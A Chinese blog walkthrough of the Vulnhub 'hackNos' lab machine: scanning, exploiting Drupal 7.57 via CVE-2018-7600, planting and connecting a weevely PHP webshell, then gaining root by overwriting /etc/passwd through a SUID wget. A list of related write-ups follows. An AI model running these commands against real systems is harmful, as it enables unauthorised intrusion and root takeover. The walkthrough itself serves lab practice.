Vulbhub-hackNos

最新推荐文章于 2024-06-22 09:52:18 发布
最新推荐文章于 2024-06-22 09:52:18 发布
阅读量194 收藏
点赞数
分类专栏: Vulnhub靶机 文章标签: ssh 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62794597/article/details/129219327
版权

1、寻址靶机的IP

2、扫描靶机开放的端口

ssh-22   apache-80

3、访问web网站

这是apache说明文章,我们因此对其进行网站扫描

4、使用gobuster进行目录扫描‘’

gobuster dir -u http://192.168.0.109 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

 

我们可以发现有 drupal网站,我们进去访问

 可以发现是一个登录界面,从网页信息中可以获得一个用户james

我们在对drupal进行目录扫描

 

可以看到用户泄露,我们对admin进行解密得到其密码为admin 123

 我尝试在网页登录和ssh登录都无法登录成功

4、我们对其网站进行cms指纹识别

可以了解到drupal版本在7左右,通过drupal目录下有个文件CHANGELOG.txt

可以了解到drupal版本在7.57

 5、寻找drupal漏洞

可以在网上寻找到drupal7.57漏洞 ,GitHub - pimps/CVE-2018-7600: Exploit for Drupal 7 <= 7.57 CVE-2018-7600 找到exp

这个漏洞是可以进行远程命令执行漏洞

python drupa7-CVE-2018-7600.py http://192.168.0.109/drupal -c "ls"

因此我们可以进行上传马,我们使用蚁剑连接

首先在kali中开启apache服务

python3 -m http.server 8888

 

 

 蚁剑连接成功后,我们需要进行提权,首先在kali中监听端口,进行反弹shell

蚁剑连接后,我无法尝试反弹shell,在此我们了解到一个新工具weevely也可以进行反弹shell

──(root㉿wxs)-[~/anyue/hackNos]
└─# weevely generate 123 Nos.php

123连接密码,Nos.php文件,进行连接

┌──(root㉿wxs)-[~/anyue/hackNos/drupal]
└─# weevely http://192.168.0.109/drupal/Nos.php 123

 进行反弹shell后,我们进行查找信息

 找到一个base64文件,我们进行解密

 

 解密后还是一个加密是一个brainfuck加密,我们使用许愿星进行解密

 得到-james-Hacker@4514

 无法ssh登录,尝试网页登录

 网页登录但是没什么用,接着使用之前反弹shell进行提权

  

 可以看见有个wget 和 passwd 因此我们可以进行suid提权

看到了wget,以及passwd。接下来的思路就是先把靶机的passwd文件搞过来,在其中创建一个新用户,然后把新的passwd文件还回去即可在靶机上获取一个高权限用户

我们就可以给其复制到本地然后生成一个hash值添加进去

openssl passwd -l -salt 用户名 passwd

 生成密码后我们需要创建/etc/passwd然后让靶机下载

 那个0:0标记着root权限

最后我们进行切换用户

sxmmmmmmm
关注
专栏目录
vulhub - SECARMY VILLAGE: GRAYHAT CONFERENCE writeup
Jiajiajiang_的博客
05-24 966
主机发现 && 端口扫描 netdiscover -i eth0 -r 192.168.154.1/24 端口扫描这次用的是threader3000 https://blog.csdn.net/Jiajiajiang_/article/details/117220625 好用 ------------------------------------------------------------ Threader 3000 - Multi-threaded.
网络渗透测试实验四 CTF实践
worker___的博客
12-13 286
实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。 系统环境:Kali Linux 2、WebDeveloper靶机来源:https://www.vulnhub.com/ 实验工具:不限 实验步骤和内容: 目的:获取靶机Web Developer 文件/root/flag.txt中fla
Vulbhub-DomDom
wwxxss
02-27 175
我们使用php代码进行建立反弹shell,因为是post传参所以对其进行url编码。我们把/index.php/index.php 改为 /admin.php。这里可以使用脏牛提权,但是我这里用新的一种查看root目录的方式,根据网站提示这是一个登录用户的界面,我们接着扫描一下网站的目录。因为靶机就开了一个80端口,因此我们只能从这三个文件中找漏洞。我们可以看见/bin/tar这说明可以对文件进行读写。开放了80端口web服务,我们访问靶机的网站。在一顿瞎试的情况下,找到了一个命令执行漏洞。
IMF_1(VulbHub)_WriteUp(1),2024-2024京东网络安全面试真题解析
m0_54816834的博客
04-07 845
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
VulbHub日记(七):Looz
Dawn_Xi的博客
09-13 286
靶机介绍 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.116 fping -aqg 192.168.56.0/24
VulbHub日记(十七):Momentum:2
Dawn_Xi的博客
11-28 2610
参考链接 Vulnhub:Momentum:2 参考博客1 参考博客2 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.139 fping -aqg 192.168.56.0/24 nmap 扫描主机 nap-A -v -p- 192.168.56.139 gobuster扫目录 gobuster dir -u http://192.168.56.139/ -x html,txt,php,bak --wordlist /usr/share/wordlists/di
Vulnhub-DC-2靶场渗透练习
weixin_52451257的博客
11-13 3664
Vulbhub-DC2 靶场地址:DC: 2 ~ VulnHub 根据提示 需要把靶机的IP和 域名绑定 修改hosts文件 Vi /etc/hosts 靶机ip dc-2 第一步:信息收集 nmap –sS 192.168.231.0/24 nmap -A -p- 192.168.231.140 扫描目录信息, 扫描目录目前掌握 dirb,nikto,dirmap,dirsearch dirb http://192.168.231.140 nikto -h htt...
2-vulnhub靶场,Earth
qq_49078152的博客
08-14 1692
vulnhub,earth靶机练习
VulnHub DC4
baynk的博客
05-18 357
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-4,313/ 下载地址2:https://pan.baidu.com/s/1VSecvfMlV7dN1-W7YlxrHg 提取码: tiwz 只有一个flag,但是给了多个切入点。 开肝。 0x01 渗透流程 nmap走起 服务端口继续扫 这次有两个端口存在,不可能ssh弱密码吧,还是先来80了。 只有这么一个登陆界面,试了SQL什么都没反应,sqlmap也一把梭过了,啥都没。通过页面的信息收集也找
Vulnhub靶机练习——Toppo
weixin_45126664的博客
08-05 1048
这是一次靶场练习,使用 kali 和 Vulnhub 的Toppo靶机 ,难度属于新手入门 ! 靶机下载地址: 1、https://download.vulnhub.com/toppo/Toppo.zip 2、https://download.vulnhub.com/toppo/Toppo.zip.torrent 知识点: 1、netdiscover发现局域网内靶机IP地址 2、nmap扫描端口、服务、漏洞 3、dirb路径扫描 4、根据发现的端口(服务),尝试相应的探测和攻击 5、cewl搜集页面关
ISCC--实战第一阶段(记Drupal漏洞利用)
qq_73767109的博客
05-19 447
或者进入pycharm中(如果是用pycharm的话)在里面搜索beautifulsoup4下载即可。使用最常见的cve-2018-7600漏洞。如果报错可以尝试进入python输入。输入ps -ef查看进程即可。按要求下载VPN连接后。用linux搜索相关漏洞。在网上搜索该漏洞的poc。把地址改成需要利用的地址。
Drupal 远程代码执行漏洞(CVE-2018-7602)
黑白的博客
12-28 3065
声明 好好学习,天天向上 漏洞描述 4月25日,Drupal官方发布通告,Drupal Core 存在一个远程代码执行漏洞,影响 7.x 和 8.x 版本。据分析,这个漏洞是CVE-2018-7600的绕过利用,两个漏洞原理是一样的,通告还称,已经发现了这个漏洞和CVE-2018-7600的在野利用 影响范围 Drupal 6.x,7.x,8.x 复现过程 这里使用7.57版本 使用vulhub /app/vulhub-master/drupal/CVE-2018-7602 使用docker启动 dock
探秘Drupal 7安全漏洞利用工具:深度剖析与应用实践
最新发布
gitblog_00043的博客
06-22 529
探秘Drupal 7安全漏洞利用工具:深度剖析与应用实践 去发现同类优质开源项目:https://gitcode.com/ 在网络安全的暗潮中,漏洞是永远的话题。今天,我们将深入探讨一个专为Drupal 7设计的安全研究工具,该工具针对著名的CVE-2018-7600与CVE-2018-7602漏洞进行了精准打击。对于那些对Web安全充满好奇,或是负责网站维护、安全审计的专业人士而言,这无疑是一个...
2、靶机——Pinkys-Place v3(2)
qq_55202378的博客
09-22 454
靶机 formatworld
教你怎么用Vulnhub来搭建环境
热门推荐
大方子
09-22 2万+
0x01 前言 Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 如果只是练习一些常见的漏洞可以看我另外两篇用Docker来搭建各种漏洞靶场(妈妈再也不用担心我没有靶场练习了)从CentOS安装Docker来搭建漏洞靶场到Joomla 3.4.5 反序列化漏洞复现(附批量Getshell脚本) 0x02 下载 https:/...
Drupal远程代码执行漏洞(CVE-2018-7602)
weixin_46411728的博客
08-24 1490
CVE-2018-7602
漏洞复现-Drupal远程代码执行漏洞(CVE-2018-7602)
qq_45751902的博客
10-23 2217
的多个子系统中存在一个远程执行代码漏洞。这可能允许攻击者利用 Drupal 站点上的多个攻击媒介,从而导致该站点受到威胁。此漏洞与 Drupal 核心 - 高度关键 - 远程代码执行 - SA-CORE-2018-002 有关。SA-CORE-2018-002 和此漏洞都在野外被利用。-c 后面接命令,紧随账号,密码。
Drupal远程代码执行漏洞(CVE-2019-6339)
weixin_46411728的博客
08-25 2697
Drupal 远程代码执行漏洞(CVE-2019-6339)
Drupal 远程代码执行漏洞(CVE-2019-6339)
limb0的博客
07-04 9091
Drupal 远程代码执行漏洞(CVE-2019-6339) 一、漏洞介绍 Drupal core是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。 Drupal core 7.62之前的7.x版本、8.6.6之前的8.6.x版本和8.5.9之前的8.5.x版本中的内置phar stream wrapper(PHP)存在远程代码执行漏洞。远程攻击者可利用该漏洞执行任意的php代码。 二、漏洞危害 远程代码执行。 三、漏洞验证 环境搭建: 实验环境 系统 IP地址 攻击
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 3166
Vulnhub靶机渗透学习——DC-9
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sxmmmmmmm

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值